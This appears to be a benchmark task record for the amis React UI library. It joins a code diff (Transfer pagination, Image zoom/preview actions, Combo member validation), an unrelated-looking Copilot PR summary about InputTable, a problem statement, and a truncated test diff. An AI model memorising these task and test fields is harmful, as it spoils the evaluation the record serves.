value}); + this.setState({ + columns: this.getColumnsWithUnit(columns), + pickerValue: value + }); } }; diff --git a/packages/amis/src/renderers/CRUD.tsx b/packages/amis/src/renderers/CRUD.tsx index 570985640..2c1094b92 100644 --- a/packages/amis/src/renderers/CRUD.tsx +++ b/packages/amis/src/renderers/CRUD.tsx @@ -2218,7 +2218,7 @@ export default class CRUD extends React.Component<CRUDProps, any> { toolbar.align || (type === 'pagination' ? 'right' : 'left'); return ( <div - key={index} + key={toolbar.id || index} className={cx( 'Crud-toolbar-item', align ? `Crud-toolbar-item--${align}` : '', diff --git a/packages/amis/src/renderers/Cards.tsx b/packages/amis/src/renderers/Cards.tsx index 11acc9823..001a73dda 100644 --- a/packages/amis/src/renderers/Cards.tsx +++ b/packages/amis/src/renderers/Cards.tsx @@ -11,7 +11,9 @@ import { difference, ucFirst, autobind, - createObject + createObject, + CustomStyle, + setThemeClassName } from 'amis-core'; import { isPureVariable, @@ -923,7 +925,10 @@ export default class Cards extends React.Component<GridProps, object> { translate: __, loading = false, loadingConfig, - env + env, + id, + wrapperCustomStyle, + themeCss } = this.props; this.renderedToolbars = []; // 用来记录哪些 toolbar 已经渲染了,已经渲染了就不重复渲染了。 @@ -973,9 +978,15 @@ export default class Cards extends React.Component<GridProps, object> { return ( <div ref={this.bodyRef} - className={cx('Cards', className, { - 'Cards--unsaved': !!store.modified || !!store.moved - })} + className={cx( + 'Cards', + className, + { + 'Cards--unsaved': !!store.modified || !!store.moved + }, + setThemeClassName('baseControlClassName', id, themeCss), + setThemeClassName('wrapperCustomStyle', id, wrapperCustomStyle) + )} style={buildStyle(style, data)} > {affixHeader ? ( @@ -1007,6 +1018,20 @@ export default class Cards extends React.Component<GridProps, object> { {footer} <Spinner loadingConfig={loadingConfig} overlay show={loading} /> + + <CustomStyle + config={{ + wrapperCustomStyle, + id, + themeCss, + classNames: [ + { + key: 'baseControlClassName' + } + ] + }} + env={env} + /> </div> ); } diff --git a/packages/amis/src/renderers/Each.tsx b/packages/amis/src/renderers/Each.tsx index a5234d45a..f66f0792f 100644 --- a/packages/amis/src/renderers/Each.tsx +++ b/packages/amis/src/renderers/Each.tsx @@ -1,5 +1,12 @@ import React from 'react'; -import {Renderer, RendererProps, buildStyle, isPureVariable} from 'amis-core'; +import { + CustomStyle, + Renderer, + RendererProps, + buildStyle, + isPureVariable, + setThemeClassName +} from 'amis-core'; import {Schema} from 'amis-core'; import {resolveVariable, resolveVariableAndFilter} from 'amis-core'; import {createObject, getPropValue, isObject} from 'amis-core'; @@ -96,7 +103,11 @@ export default class Each extends React.Component<EachProps> { indexKeyName, placeholder, classnames: cx, - translate: __ + translate: __, + env, + id, + wrapperCustomStyle, + themeCss } = this.props; const value = getPropValue(this.props, props => @@ -124,7 +135,14 @@ export default class Each extends React.Component<EachProps> { } return ( - <div className={cx('Each', className)} style={buildStyle(style, data)}> + <div + className={cx( + 'Each', + className, + setThemeClassName('baseControlClassName', id, themeCss) + )} + style={buildStyle(style, data)} + > {Array.isArray(arr) && arr.length && items ? ( arr.map((item: any, index: number) => ( <EachItem @@ -144,6 +162,20 @@ export default class Each extends React.Component<EachProps> { {render('placeholder', __(placeholder))} </div> )} + + <CustomStyle + config={{ + wrapperCustomStyle, + id, + themeCss, + classNames: [ + { + key: 'baseControlClassName' + } + ] + }} + env={env} + /> </div> ); } diff --git a/packages/amis/src/renderers/Form/Combo.tsx b/packages/amis/src/renderers/Form/Combo.tsx index 8d51f0f53..0dea000a6 100644 --- a/packages/amis/src/renderers/Form/Combo.tsx +++ b/packages/amis/src/renderers/Form/Combo.tsx @@ -8,7 +8,10 @@ import { resolveEventData, ApiObject, FormHorizontal, - evalExpressionWithConditionBuilder + evalExpressionWithConditionBuilder, + IFormStore, + getVariable, + IFormItemStore } from 'amis-core'; import {ActionObject, Api} from 'amis-core'; import {ComboStore, IComboStore} from 'amis-core'; @@ -37,7 +40,11 @@ import {isEffectiveApi, str2AsyncFunction} from 'amis-core'; import {Alert2} from 'amis-ui'; import memoize from 'lodash/memoize'; import {Icon} from 'amis-ui'; -import {isAlive} from 'mobx-state-tree'; +import { + isAlive, + clone as cloneModel, + destroy as destroyModel +} from 'mobx-state-tree'; import { FormBaseControlSchema, SchemaApi, @@ -48,7 +55,6 @@ import { import {ListenerAction} from 'amis-core'; import type {SchemaTokenizeableString} from '../../Schema'; import isPlainObject from 'lodash/isPlainObject'; -import {isMobile} from 'amis-core'; export type ComboCondition = { test: string; @@ -395,6 +401,7 @@ export default class ComboControl extends React.Component<ComboProps> { this.dragTipRef = this.dragTipRef.bind(this); this.flush = this.flush.bind(this); this.handleComboTypeChange = this.handleComboTypeChange.bind(this); + this.handleSubFormValid = this.handleSubFormValid.bind(this); this.defaultValue = { ...props.scaffold }; @@ -797,6 +804,11 @@ export default class ComboControl extends React.Component<ComboProps> { ); } + handleSubFormValid(valid: boolean, {index}: any) { + const {store} = this.props; + store.setMemberValid(valid, index); + } + handleFormInit(values: any, {index}: any) { const { syncDefaultValue, @@ -806,9 +818,15 @@ export default class ComboControl extends React.Component<ComboProps> { formInited, onChange, submitOnChange, - setPrinstineValue + setPrinstineValue, + formItem } = this.props; + // 已经开始验证了,那么打开成员的时候,就要验证一下。 + if (formItem?.validated) { + this.subForms[index]?.validate(true, false, false); + } + this.subFormDefaultValues.push({ index, values, @@ -881,7 +899,13 @@ export default class ComboControl extends React.Component<ComboProps> { } validate(): any { - const {messages, nullable, translate: __} = this.props; + const { + messages, + nullable, + value: rawValue, + translate: __, + store + } = this.props; const value = this.getValueAsArray(); const minLength = this.resolveVariableProps(this.props, 'minLength'); const maxLength = this.resolveVariableProps(this.props, 'maxLength'); @@ -896,18 +920,62 @@ export default class ComboControl extends React.Component<ComboProps> { (messages && messages.maxLengthValidateFailed) || 'Combo.maxLength', {maxLength} ); - } else if (this.subForms.length && (!nullable || value)) { - return Promise.all(this.subForms.map(item => item.validate())).then( - values => { - if (~values.indexOf(false)) { - return __( - (messages && messages.validateFailed) || 'validateFailed' - ); + } else if (nullable && !rawValue) { + return; // 不校验 + } else if (value.length) { + return Promise.all( + value.map(async (values: any, index: number) => { + const subForm = this.subForms[index]; + if (subForm) { + return subForm.validate(true, false, false); + } else { + // 那些还没有渲染出来的数据 + // 因为有可能存在分页,有可能存在懒加载,所以没办法直接用 subForm 去校验了 + const subForm = this.subForms[Object.keys(this.subForms)[0] as any]; + if (subForm) { + const form: IFormStore = subForm.props.store; + let valid = false; + for (let formitem of form.items) { + const cloned: IFormItemStore = cloneModel(formitem); + let value: any = getVariable(values, formitem.name, false); + + if (formitem.extraName) { + value = [ + getVariable(values, formitem.name, false), + getVariable(values, formitem.extraName, false) + ]; + } + + cloned.changeTmpValue(value, 'dataChanged'); + valid = await cloned.validate(values); + destroyModel(cloned); + if (valid === false) { + break; + } + } + + store.setMemberValid(valid, index); + return valid; + } } + }) + ).then(values => { + if (~values.indexOf(false)) { + return __((messages && messages.validateFailed) || 'validateFailed'); + } - return; + return; + }); + } else if (this.subForms.length) { + return Promise.all( + this.subForms.map(item => item.validate(true, false, false)) + ).then(values => { + if (~values.indexOf(false)) { + return __((messages && messages.validateFailed) || 'validateFailed'); } - ); + + return; + }); } } @@ -1253,6 +1321,12 @@ export default class ComboControl extends React.Component<ComboProps> { // 不能按需渲染,因为 unique 会失效。 mountOnEnter={!hasUnique} unmountOnExit={false} + className={ + store.memberValidMap[index] === false ? 'has-error' : '' + } + tabClassName={ + store.memberValidMap[index] === false ? 'has-error' : '' + } > {condition && typeSwitchable !== false ? ( <div className={cx('Combo-itemTag')}> @@ -1485,7 +1559,8 @@ export default class ComboControl extends React.Component<ComboProps> { itemClassName, itemsWrapperClassName, static: isStatic, - mobileUI + mobileUI, + store } = this.props; let items = this.props.items; @@ -1543,7 +1618,11 @@ export default class ComboControl extends React.Component<ComboProps> { return ( <div - className={cx(`Combo-item`, itemClassName)} + className={cx( + `Combo-item`, + itemClassName, + store.memberValidMap[index] === false ? 'has-error' : '' + )} key={this.keys[index]} > {!isStatic && !disabled && draggable && thelist.length > 1 ? ( @@ -1622,7 +1701,8 @@ export default class ComboControl extends React.Component<ComboProps> { nullable, translate: __, itemClassName, - mobileUI + mobileUI, + store } = this.props; let items = this.props.items; @@ -1646,7 +1726,13 @@ export default class ComboControl extends React.Component<ComboProps> { disabled ? 'is-disabled' : '' )} > - <div className={cx(`Combo-item`, itemClassName)}> + <div + className={cx( + `Combo-item`, + itemClassName, + store.memberValidMap[0] === false ? 'has-error' : '' + )} + > {condition && typeSwitchable !== false ? ( <div className={cx('Combo-itemTag')}> <label>{__('Combo.type')}</label> @@ -1715,11 +1801,13 @@ export default class ComboControl extends React.Component<ComboProps> { className: cx(`Combo-form`, formClassName) }, { + index: 0, disabled: disabled, static: isStatic, data, onChange: this.handleSingleFormChange, ref: this.makeFormRef(0), + onValidChange: this.handleSubFormValid, onInit: this.handleSingleFormInit, canAccessSuperData, formStore: undefined, @@ -1749,6 +1837,7 @@ export default class ComboControl extends React.Component<ComboProps> { onAction: this.handleAction, onRadioChange: this.handleRadioChange, ref: this.makeFormRef(index), + onValidChange: this.handleSubFormValid, canAccessSuperData, lazyChange: changeImmediately ? false : true, formLazyChange: false, diff --git a/packages/amis/src/renderers/Form/NestedSelect.tsx b/packages/amis/src/renderers/Form/NestedSelect.tsx index 4eee55e98..22cb17468 100644 --- a/packages/amis/src/renderers/Form/NestedSelect.tsx +++ b/packages/amis/src/renderers/Form/NestedSelect.tsx @@ -172,6 +172,11 @@ export default class NestedSelectControl extends React.Component< return !!rendererEvent?.prevented; } + /** 是否为父节点 */ + isParentNode(option: Option) { + return Array.isArray(option.children) && option.children.length > 0; + } + @autobind handleOutClick(e: React.MouseEvent<any>) { const {options} = this.props; @@ -295,7 +300,7 @@ export default class NestedSelectControl extends React.Component< return; } - if (onlyLeaf && option.children) { + if (onlyLeaf && this.isParentNode(option)) { return; } @@ -327,7 +332,7 @@ export default class NestedSelectControl extends React.Component< let valueField = this.props.valueField || 'value'; - if (onlyLeaf && !Array.isArray(option) && option.children) { + if (onlyLeaf && !Array.isArray(option) && this.isParentNode(option)) { return; } @@ -431,6 +436,7 @@ export default class NestedSelectControl extends React.Component< allChecked(options: Options): boolean { const {selectedOptions, withChildren, onlyChildren} = this.props; + return options.every(option => { if ((withChildren || onlyChildren) && option.children) { return this.allChecked(option.children); @@ -683,8 +689,8 @@ export default class NestedSelectControl extends React.Component< if ( !selfChecked && onlyChildren && - option.children && - this.allChecked(option.children) + this.isParentNode(option) && + this.allChecked(option.children!) ) { selfChecked = true; } @@ -728,7 +734,11 @@ export default class NestedSelectControl extends React.Component< </div> {option.children && option.children.length ? ( - <div className={cx('NestedSelect-optionArrowRight')}> + <div + className={cx('NestedSelect-optionArrowRight', { + 'is-disabled': nodeDisabled + })} + > <Icon icon="right-arrow-bold" className="icon" /> </div> ) : null} @@ -799,8 +809,8 @@ export default class NestedSelectControl extends React.Component< if ( !isChecked && onlyChildren && - option.children && - this.allChecked(option.children) + this.isParentNode(option) && + this.allChecked(option.children!) ) { isChecked = true; } diff --git a/packages/amis/src/renderers/Form/Transfer.tsx b/packages/amis/src/renderers/Form/Transfer.tsx index 44a8c5c0f..695d05461 100644 --- a/packages/amis/src/renderers/Form/Transfer.tsx +++ b/packages/amis/src/renderers/Form/Transfer.tsx @@ -1,17 +1,17 @@ import React from 'react'; import find from 'lodash/find'; - +import pick from 'lodash/pick'; +import {isAlive} from 'mobx-state-tree'; +import {matchSorter} from 'match-sorter'; import { OptionsControlProps, OptionsControl, - FormOptionsControl, resolveEventData, str2function, - getOptionValueBindField -} from 'amis-core'; -import {SpinnerExtraProps, Transfer} from 'amis-ui'; -import type {Option} from 'amis-core'; -import { + getOptionValueBindField, + isEffectiveApi, + isPureVariable, + resolveVariableAndFilter, autobind, filterTree, string2regExp, @@ -20,18 +20,25 @@ import { findTreeIndex, getTree, spliceTree, - mapTree + mapTree, + optionValueCompare, + resolveVariable, + ActionObject, + toNumber } from 'amis-core'; -import {Spinner} from 'amis-ui'; -import {optionValueCompare} from 'amis-core'; -import {resolveVariable} from 'amis-core'; -import {FormOptionsSchema, SchemaApi, SchemaObject} from '../../Schema'; -import {Selection as BaseSelection} from 'amis-ui'; -import {ResultList} from 'amis-ui'; -import {ActionObject, toNumber} from 'amis-core'; -import type {ItemRenderStates} from 'amis-ui/lib/components/Selection'; +import {SpinnerExtraProps, Transfer, Spinner, ResultList} from 'amis-ui'; +import { + FormOptionsSchema, + SchemaApi, + SchemaObject, + SchemaExpression, + SchemaClassName +} from '../../Schema'; import {supportStatic} from './StaticHoc'; -import {matchSorter} from 'match-sorter'; + +import type {ItemRenderStates} from 'amis-ui/lib/components/Selection'; +import type {Option} from 'amis-core'; +import type {PaginationSchema} from '../Pagination'; /** * Transfer @@ -161,6 +168,22 @@ export interface TransferControlSchema * 树形模式下,仅选中子节点 */ onlyChildren?: boolean; + + /** + * 分页配置,selectMode为默认和table才会生效 + * @since 3.6.0 + */ + pagination?: { + /** 是否左侧选项分页,默认不开启 */ + enable: SchemaExpression; + /** 分页组件CSS类名 */ + className?: SchemaClassName; + /** 是否开启前端分页 */ + loadDataOnce?: boolean; + } & Pick< + PaginationSchema, + 'layout' | 'maxButtons' | 'perPageAvailable' | 'popOverContainerSelector' + >; } export interface BaseTransferProps @@ -427,6 +450,30 @@ export class BaseTransferRenderer< return regexp.test(labelTest) || regexp.test(valueTest); } + @autobind + handlePageChange( + page: number, + perPage?: number, + direction?: 'forward' | 'backward' + ) { + const {source, data, formItem, onChange} = this.props; + const ctx = createObject(data, { + page: page ?? 1, + perPage: perPage ?? 10, + ...(direction ? {pageDir: direction} : {}) + }); + + if (!formItem || !isAlive(formItem)) { + return; + } + + if (isPureVariable(source)) { + formItem.loadOptionsFromDataScope(source, ctx, onChange); + } else if (isEffectiveApi(source, ctx)) { + formItem.loadOptions(source, ctx, undefined, false, onChange, false); + } + } + @autobind optionItemRender(option: Option, states: ItemRenderStates) { const {menuTpl, render, data} = this.props; @@ -544,7 +591,11 @@ export class BaseTransferRenderer< showInvalidMatch, onlyChildren, mobileUI, - noResultsText + noResultsText, + pagination, + formItem, + env, + popOverContainer } = this.props; // 目前 LeftOptions 没有接口可以动态加载 @@ -570,6 +621,7 @@ export class BaseTransferRenderer< onlyChildren={onlyChildren} value={selectedOptions} options={options} + accumulatedOptions={formItem?.accumulatedOptions ?? []} disabled={disabled} onChange={this.handleChange} option2value={this.option2value} @@ -607,6 +659,28 @@ export class BaseTransferRenderer< showInvalidMatch={showInvalidMatch} mobileUI={mobileUI} noResultsText={noResultsText} + pagination={{ + ...pick(pagination, [ + 'className', + 'layout', + 'perPageAvailable', + 'popOverContainerSelector' + ]), + enable: + !!formItem?.enableSourcePagination && + (!selectMode || + selectMode === 'list' || + selectMode === 'table') && + options.length > 0, + maxButtons: Number.isInteger(pagination?.maxButtons) + ? pagination.maxButtons + : 5, + page: formItem?.sourcePageNum, + perPage: formItem?.sourcePerPageNum, + total: formItem?.sourceTotalNum, + popOverContainer: popOverContainer ?? env?.getModalContainer + }} + onPageChange={this.handlePageChange} /> <Spinner diff --git a/packages/amis/src/renderers/Image.tsx b/packages/amis/src/renderers/Image.tsx index c29071daa..feec4e7df 100644 --- a/packages/amis/src/renderers/Image.tsx +++ b/packages/amis/src/renderers/Image.tsx @@ -3,7 +3,13 @@ import { Renderer, RendererProps, CustomStyle, - setThemeClassName + setThemeClassName, + ActionObject, + IScopedContext, + ScopedContext, + createObject, + resolveVariableAndFilter, + isPureVariable } from 'amis-core'; import {filter} from 'amis-core'; import {themeable, ThemeProps} from 'amis-core'; @@ -398,6 +404,8 @@ export interface ImageFieldProps extends RendererProps { enlargeWithGallary?: boolean; showToolbar?: boolean; toolbarActions?: ImageAction[]; + maxScale?: number; + minScale?: number; onImageEnlarge?: ( info: { src: string; @@ -414,9 +422,21 @@ export interface ImageFieldProps extends RendererProps { target: any ) => void; imageGallaryClassName?: string; + onClick?: + | ((e: React.MouseEvent<any>, props: any) => void) + | string + | Function + | null; } -export class ImageField extends React.Component<ImageFieldProps, object> { +interface ImageFieldState { + scale: number; // 放大倍率 +} + +export class ImageField extends React.Component< + ImageFieldProps, + ImageFieldState +> { static defaultProps: Pick< ImageFieldProps, 'defaultImage' | 'thumbMode' | 'thumbRatio' @@ -426,6 +446,10 @@ export class ImageField extends React.Component<ImageFieldProps, object> { thumbRatio: '1:1' }; + state: ImageFieldState = { + scale: 1 + }; + @autobind handleEnlarge({ src, @@ -468,13 +492,73 @@ export class ImageField extends React.Component<ImageFieldProps, object> { } @autobind - handleClick(e: React.MouseEvent<HTMLElement>) { + async handleClick(e: React.MouseEvent<HTMLElement>) { + const {dispatchEvent, data} = this.props; const clickAction = this.props.clickAction; + const rendererEvent = await dispatchEvent( + e, + createObject(data, { + nativeEvent: e + }) + ); + + if (rendererEvent?.prevented) { + return; + } if (clickAction) { handleAction(e, clickAction, this.props); } } + @autobind + handleMouseEnter(e: React.MouseEvent<any>) { + const {dispatchEvent, data} = this.props; + dispatchEvent(e, data); + } + + @autobind + handleMouseLeave(e: React.MouseEvent<any>) { + const {dispatchEvent, data} = this.props; + dispatchEvent(e, data); + } + + handleSelfAction(actionType: string, action: ActionObject) { + let {data, maxScale = 200, minScale = 50} = this.props; + let {scale = 50} = action.args; + if (actionType === 'zoom') { + if (isPureVariable(maxScale)) { + maxScale = isNaN( + resolveVariableAndFilter(maxScale, createObject(action.data, data)) + ) + ? 200 + : resolveVariableAndFilter(maxScale, createObject(action.data, data)); + } + if (isPureVariable(minScale)) { + minScale = isNaN( + resolveVariableAndFilter(minScale, createObject(action.data, data)) + ) + ? 50 + : resolveVariableAndFilter(minScale, createObject(action.data, data)); + } + + if (scale >= 0) { + this.setState({ + scale: + this.state.scale + scale / 100 < maxScale / 100 + ? this.state.scale + scale / 100 + : maxScale / 100 + }); + } else { + this.setState({ + scale: + this.state.scale + scale / 100 > minScale / 100 + ? this.state.scale + scale / 100 + : minScale / 100 + }); + } + } + } + render() { const { className, @@ -520,8 +604,10 @@ export class ImageField extends React.Component<ImageFieldProps, object> { className, setThemeClassName('wrapperCustomStyle', id, wrapperCustomStyle) )} - style={style} + style={{...style, transform: `scale(${this.state.scale})`}} onClick={this.handleClick} + onMouseEnter={this.handleMouseEnter} + onMouseLeave={this.handleMouseLeave} > {value || (!value && !placeholder) ? ( <ThemedImageThumb @@ -597,4 +683,26 @@ export class ImageField extends React.Component<ImageFieldProps, object> { @Renderer({ type: 'image' }) -export class ImageFieldRenderer extends ImageField {} +export class ImageFieldRenderer extends ImageField { + static contextType = ScopedContext; + constructor(props: ImageFieldProps, context: IScopedContext) { + super(props); + + const scoped = context; + scoped.registerComponent(this); + } + + componentWillUnmount() { + const scoped = this.context as IScopedContext; + scoped.unRegisterComponent(this); + } + + doAction(action: ActionObject) { + const actionType = action?.actionType as string; + if (actionType === 'preview') { + this.handleEnlarge(this.props as ImageThumbProps); + } else { + this.handleSelfAction(actionType, action); + } + } +} diff --git a/packages/amis/src/renderers/QuickEdit.tsx b/packages/amis/src/renderers/QuickEdit.tsx index a49680a29..7a6481cc5 100644 --- a/packages/amis/src/renderers/QuickEdit.tsx +++ b/packages/amis/src/renderers/QuickEdit.tsx @@ -512,7 +512,7 @@ export const HocQuickEdit = > {render('quick-edit-form', this.buildSchema(), { value: undefined, - static: false, + defaultStatic: false, onSubmit: this.handleSubmit, onAction: this.handleAction, onChange: null, @@ -577,7 +577,8 @@ export const HocQuickEdit = mode: 'normal', value: value ?? '', onChange: this.handleFormItemChange, - ref: this.formItemRef + ref: this.formItemRef, + defaultStatic: false }); } @@ -591,7 +592,8 @@ export const HocQuickEdit = onChange: this.handleChange, formLazyChange: false, canAccessSuperData, - disabled + disabled, + defaultStatic: false }); } diff --git a/packages/amis/src/renderers/SwitchContainer.tsx b/packages/amis/src/renderers/SwitchContainer.tsx index 62d8f598a..7aad5492c 100644 --- a/packages/amis/src/renderers/SwitchContainer.tsx +++ b/packages/amis/src/renderers/SwitchContainer.tsx @@ -80,7 +80,7 @@ export default class SwitchContainer extends React.Component< componentDidUpdate(preProps: SwitchContainerProps) { const items = this.props.items || []; - if (this.state.activeIndex >= 0 && !items[this.state.activeIndex]) { + if (this.state.activeIndex > 0 && !items[this.state.activeIndex]) { this.setState({ activeIndex: 0 }); diff --git a/packages/amis/src/renderers/Table/AutoFilterForm.tsx b/packages/amis/src/renderers/Table/AutoFilterForm.tsx index d3d14f709..54aee11dd 100644 --- a/packages/amis/src/renderers/Table/AutoFilterForm.tsx +++ b/packages/amis/src/renderers/Table/AutoFilterForm.tsx @@ -71,7 +71,7 @@ export function AutoFilterForm({ }) ); - let showExpander = searchableColumns.length >= columnsNum; + let showExpander = activedSearchableColumns.length >= columnsNum; // todo 以后做动画 if (!searchFormExpanded && body.length) { @@ -100,7 +100,7 @@ export function AutoFilterForm({ } lastGroup.body.push({ type: 'container', - className: 'ButtonToolbar text-right block', + className: 'AutoFilterToolbar', wrapperBody: false, body: [ { @@ -114,32 +114,31 @@ export function AutoFilterForm({ visible: showBtnToolbar, buttons: searchableColumns.map(column => { return { - type: 'checkbox', - label: false, - className: cx('Table-searchableForm-checkbox'), - inputClassName: cx('Table-searchableForm-checkbox-inner'), - name: `${ - column.searchable.strategy === 'jsonql' ? '' : '__search_' - }${column.searchable?.name ?? column.name}`, - option: column.searchable?.label ?? column.label, - /** - * syncLocation开启后,参数值会从地址栏Query中二次同步到数据域中,其中布尔(boolean)类型的值被转化为字符串 - * eg: - * true ==> "true" - * false ==> "false" - * 所以这里将真值和假值转化成字符串格式规避 - */ - trueValue: '1', - falseValue: '0', - value: !!column.enableSearch ? '1' : '0', - badge: { - offset: [-10, 5], - visibleOn: `${ - column.toggable && !column.toggled && column.enableSearch - }` - }, - onChange: (value: '1' | '0') => - onItemToggleExpanded?.(column, value === '1' ? true : false) + children: ({render}: any) => + render( + `column-search-toggler-${column.id}`, + { + type: 'checkbox', + label: false, + className: cx('Table-searchableForm-checkbox'), + inputClassName: cx('Table-searchableForm-checkbox-inner'), + name: `__whatever_name`, + option: column.searchable?.label ?? column.label, + badge: { + offset: [-10, 5], + visibleOn: `${ + column.toggable && + !column.toggled && + column.enableSearch + }` + } + }, + { + value: activedSearchableColumns.includes(column), + onChange: (value: any) => + onItemToggleExpanded?.(column, value) + } + ) }; }) }, @@ -147,34 +146,35 @@ export function AutoFilterForm({ { type: 'submit', label: __('search'), + size: 'sm', level: 'primary', - className: 'w-18' + className: 'w-18 mr-2' }, { type: 'reset', label: __('reset'), + size: 'sm', className: 'w-18' }, - showExpander - ? { - children: () => ( - <a - className={cx( - 'Table-SFToggler', - searchFormExpanded ? 'is-expanded' : '' - )} - onClick={onToggleExpanded} - > - {__(searchFormExpanded ? 'collapse' : 'expand')} - <span className={cx('Table-SFToggler-arrow')}> - <Icon icon="right-arrow-bold" className="icon" /> - </span> - </a> - ) - } - : null - ].filter(item => item) + { + children: () => + showExpander ? ( + <a + className={cx( + 'Table-SFToggler', + searchFormExpanded ? 'is-expanded' : '' + )} + onClick={onToggleExpanded} + > + {__(searchFormExpanded ? 'collapse' : 'expand')} + <span className={cx('Table-SFToggler-arrow')}> + <Icon icon="right-arrow-bold" className="icon" /> + </span> + </a> + ) : null + } + ] }); return { @@ -227,7 +227,7 @@ export default observer( const onItemToggleExpanded = React.useCallback( (column: IColumn, value: boolean) => { column.setEnableSearch(value); - store.setSearchFormExpanded(true); + value && store.setSearchFormExpanded(true); }, [] ); diff --git a/packages/amis/src/types.ts b/packages/amis/src/types.ts index 79a08921a..aec4a6775 100644 --- a/packages/amis/src/types.ts +++ b/packages/amis/src/types.ts @@ -115,7 +115,9 @@ export interface Action extends Button { | 'selectAll' | 'changeTabKey' | 'click' - | 'stopAutoRefresh'; + | 'stopAutoRefresh' + | 'preview' + | 'zoom'; api?: SchemaApi; asyncApi?: SchemaApi; payload?: any;
feat(amis-editor): InputTable配置面板补充属性 ### What <!-- copilot:summary --> ### <samp>🤖 Generated by Copilot at 1b22ca7</samp> Added new options to the `table` control plugin schema in `Form/InputTable.tsx` to allow users to control the table layout and actions. <!-- copilot:poem --> ### <samp>🤖 Generated by Copilot at 1b22ca7</samp> > _To make tables more flexible and fun_ > _This pull request adds options, not one_ > _But three in the schema_ > _`showAddButton`, `className`, and `showOperationColumn`_ > _Now you can customize how they look and run_ ### Why <!-- author to complete --> ### How <!-- copilot:walkthrough --> ### <samp>🤖 Generated by Copilot at 1b22ca7</samp> * Add switch options to toggle add buttons and operation column in table control plugin schema ([link](https://github.com/baidu/amis/pull/8629/files?diff=unified&w=0#diff-01999eae047ec7fdb8502c22801699d39f7a54c994a9414462c0fbe21634ecd8R1074-R1083)) * Add className option to customize toolbar element in table control plugin schema ([link](https://github.com/baidu/amis/pull/8629/files?diff=unified&w=0#diff-01999eae047ec7fdb8502c22801699d39f7a54c994a9414462c0fbe21634ecd8R1093-R1096))
**Title** Add pagination to Transfer, new Image actions/events, improve validation, UI tweaks and docs **Problem** - Transfer component had no pagination support, making large option sets unusable. - Image component lacked event emission and actions for preview/zoom, and scaling limits were missing. - Form validation performed strict shallow comparisons, causing unnecessary reloads and failing on loosely‑equal values. - Combo validation did not track validity of individual members, leading to incorrect error states. - Documentation for Transfer pagination and several component schemas was outdated. **Root Cause** - Transfer’s `FormItemStore` never stored pagination state nor sliced options; UI lacked pagination controls. - Image plugin did not define events/actions and the renderer did not handle them. - `isObjectShallowModified` only used strict equality, ignoring common loose‑equal cases. - `ComboStore` did not keep a map of each member’s validation result. - Docs and schema definitions did not reflect new pagination and image capabilities. **Fix / Expected Behavior** - Introduce `pagination` config in Transfer schema, load and slice options according to page/perPage, expose pagination UI and `onPageChange` callback. - Extend `FormItemStore` with pagination state (`enable`, `page`, `perPage`, `total`) and methods to update it when loading data. - Add Image events (`click`, `mouseenter`, `mouseleave`) and actions (`preview`, `zoom`) with UI controls for max/min scale. - Update `isObjectShallowModified` to accept a custom comparator, applying loose equality for specific value pairs. - Add `memberValidMap` to `ComboStore` and propagate member validity via `onValidChange` in Form, displaying error styling per combo item. - Refresh documentation (Transfer pagination, Image actions, UUID function) and adjust SCSS for Transfer footer, pagination, dropdowns, menus, tabs, combo, date picker, nested select, select, and other components. - Align editor plugins to expose new variable handling and event/action schemas. **Risk & Validation** - Pagination adds new request parameters; existing APIs may need to honor `page`/`perPage`. Verify backward compatibility with unchanged Transfer usage. - Modified shallow comparison could alter reload behavior; run the full test suite and manually test forms with numeric/string mixed values. - New UI styles may affect custom themes; review visual regression tests for affected components. - Ensure Image actions work in all contexts (static, form, table) and that combo validation correctly shows per‑item errors. - Validate documentation reflects the runtime behavior and that TypeScript typings remain accurate.
8,629
baidu/amis
diff --git a/packages/amis-formula/__tests__/evalute.test.ts b/packages/amis-formula/__tests__/evalute.test.ts index 32d23b1e5..151d84a7a 100644 --- a/packages/amis-formula/__tests__/evalute.test.ts +++ b/packages/amis-formula/__tests__/evalute.test.ts @@ -563,6 +563,18 @@ test('evalute:Math', () => { expect(evaluate('${POW(2, infinity)}', data)).toBe(data.infinity); }); +test('evalute:UUID', () => { + function isUUIDv4(value: string) { + return /^[0-9A-F]{8}-[0-9A-F]{4}-4[0-9A-F]{3}-[89AB][0-9A-F]{3}-[0-9A-F]{12}$/i.test( + value + ); + } + + expect(isUUIDv4(evaluate('${UUID()}', {}))).toBe(true); + expect(evaluate('${UUID()}', {}).length).toBe(36); + expect(evaluate('${UUID(8)}', {}).length).toBe(8); +}); + test('evalute:namespace', () => { localStorage.setItem('a', '1'); localStorage.setItem('b', '2'); diff --git a/packages/amis/__tests__/renderers/CRUD.test.tsx b/packages/amis/__tests__/renderers/CRUD.test.tsx index 043ea6389..1f5aae08c 100644 --- a/packages/amis/__tests__/renderers/CRUD.test.tsx +++ b/packages/amis/__tests__/renderers/CRUD.test.tsx @@ -20,6 +20,7 @@ * 17. api 返回格式支持取对象中的第一个数组 * 18. CRUD 事件 * 19. fetchInitData silent 静默请求 + * 20. CRUD表头查询字段更新后严格比较场景 */ import { @@ -1046,9 +1047,8 @@ test('17. should use the first array item in the response if provided', async () ) ); - waitFor(() => { - expect(container.querySelectorAll('tbody>tr').length).toBe(2); - }); + await wait(200); + expect(container.querySelectorAll('tbody>tr').length).toBe(2); }); describe('18. inner events', () => { @@ -1149,3 +1149,169 @@ test('19. fetchInitData silent true', async () => { expect(notify).toBeCalledTimes(1); }); }); + +test('20. CRUD filters contain fields that modification inspection should use strict mode', async () => { + let keyword; + const mockFetcher = jest.fn().mockImplementation((req) => { + /** mock.calls[0][0]拿不到filter里的参数,先用闭包测试吧 */ + keyword = req.data.version; + return Promise.resolve({ + data: { + status: 0, + msg: 'ok', + data: { + count: 0, + items: [] + } + } + }) + }); + const {container} = render( + amisRender( + { + type: 'page', + body: [ + { + "type": "crud", + "name": "crud", + "syncLocation": false, + "api": { + "method": "post", + "url": "/api/mock/crud" + }, + "filter": { + "body": [ + { + "type": "select", + "name": "version", + "label": "version", + "clearable": true, + "options": [ + {"label": "0", "value": 0}, + {"label": "1", "value": 1}, + {"label": "true", "value": true}, + {"label": "false", "value": false}, + {"label": "emptyString", "value": ''}, + {"label": "stringZero", "value": '0'}, + {"label": "stringOne", "value": '1'} + ] + } + ], + "actions": [ + { + "type": "submit", + "label": "SubmitBtn", + "primary": true + } + ] + }, + "columns": [ + { + "name": "id", + "label": "ID" + }, + { + "name": "version", + "label": "Engine version engine" + } + ], + } + ] + }, + {}, + makeEnv({fetcher: mockFetcher}) + ) + ); + + const select = container.querySelector('.cxd-Select')!; + const submitBtn = container.querySelector("button[type='submit']")!; + + fireEvent.click(select); + await wait(200); + 